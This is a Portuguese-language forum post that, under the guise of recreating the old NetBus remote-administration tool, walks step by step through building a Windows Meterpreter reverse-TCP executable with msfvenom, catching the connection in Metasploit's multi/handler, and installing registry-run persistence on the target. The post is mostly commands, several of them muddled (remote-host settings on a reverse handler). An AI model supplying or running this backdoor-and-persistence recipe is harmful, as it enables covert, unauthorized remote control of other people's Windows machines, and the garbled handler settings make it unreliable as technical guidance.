Page 1 of 1

Criando netbus via console do Linux + Metasploit

Posted: 25 Feb 2018, 23:06
by javanunes
Em 1999 , a saudosa época do ICQ , era muito comum as pessoas instalarem o tal programa NETbus em máquinas que precisavam ser administradas remotamente, esse programa tinha várias funções como trancar o mouse, abrir porta do drive de cd, reiniciar e passar alguns comandos. Muito útil ao administrador de máquinas.

Hoje, 19 anos depois, eu irei mostrar como fazer algo parecido pelo saudoso console do Linux. Você irá criar um executável no console do Linux e poderá rodá-lo em uma máquina Windows que deseja administrar. Fique tranquilo pois o padrão binário do executável não será elf mas sim MZ(exe).

É preciso que você tenha o Metasploit instalado em sua máquina , alguns bobões que só usam Linux para brincar de máquina virtual gostam de usar o kali linux pois nele esse programa já vem pré instalado. É importante ressaltar aos bobocas que nem Linux usam que esse e outros programas podem ser instalados na sua distribuição predileta de Linux, não só a Kali embora nessa as coisas sejam mais mastigadas.

Você irá executar no console(terminal ou ctr+alt+f3) um comando onde o IP e a Porta da máquina a ser administrada será por conta sua:

Code: Select all

msfvenom LHOST=198.185.159.144 LPORT=12345 -f exe -o /tmp/netbus.exe -p windows/meterpreter/reverse_tcp --platform windows -a x86 
O comando acima irá criar um executável administrativo na pastinha /tmp/ do seu Linux , ele irá se chamar netbus.exe , o IP e a porta que eu coloquei acima são fictícios, você pode mudar para o ip e porta do servidor seu porem eu devo lembrar que a porta 12345 era do netbus mesmo.
Leve o netbus.exe para o seu servidor a ser administrado e o rode lá, pronto, ele poderá ser administrado por você para testes, afinal ele não esta protegido por senha, lembre-se disso!

Bom, agora iremos administrar o servidor 198.185.159.144 , para isso, no console digite

Code: Select all

msfconsole
Depois coloque passo a passo as linhas que eu irei exibir, dentro do prompt do metasploit (msf >) , os comandos abaixo só irão ter êxito se já estiver rodando o netbus.exe no nosso servidor sem nenhum firewall que bloqueie essa porta.

Code: Select all

use exploit/multi/handler

Code: Select all

set PAYLOAD windows/meterpreter/reverse_tcp 

Code: Select all

set RHOST 198.185.159.144

Code: Select all

set RPORT 12345

Code: Select all

exploit
Apos ter rodado o comando acima, se você tiver sucesso, estará conectado ao host do exemplo, no caso o 198.185.159.144
Para saber os comandos que você pode usar para administrar o host remoto, você poderá usar o comando help.

Mas ainda falta fazer o netbus ser executado sempre , para isso, colocaremos um comando que fará o nosso executavel entrar na chave run do registro do windows

Code: Select all

run persistence -A -X -i 60 -p 12345 -f 198.185.159.144
Se você quiser ler os valores de um registro, você usar o exemplo abaixo no prompt do meta

Code: Select all

reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentVersion\Blabla\curola"
claro, as chaves são fictícias.

Agora para eu colocar um valor no regedit eu uso

Code: Select all

reg setval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentVersion\Blabla" -v Es_vadia -t REG_DWORD -d 1
nesse caso eu fiz a variável Es_vadia valer 1

Lembre, o servidor precisa estar na mesma rede que a sua se não você terá problema de NAT e redirecionamento de portas para alcançá-lo, embora não seja impossível. Você pode usar outras portas se quiser, mas como o tutorial é em homenagem ao netbus, eu escolhi a porta 12345.
Explore o help, ele irá dar várias opções para você explorar como administrador do sistema.

Code: Select all

help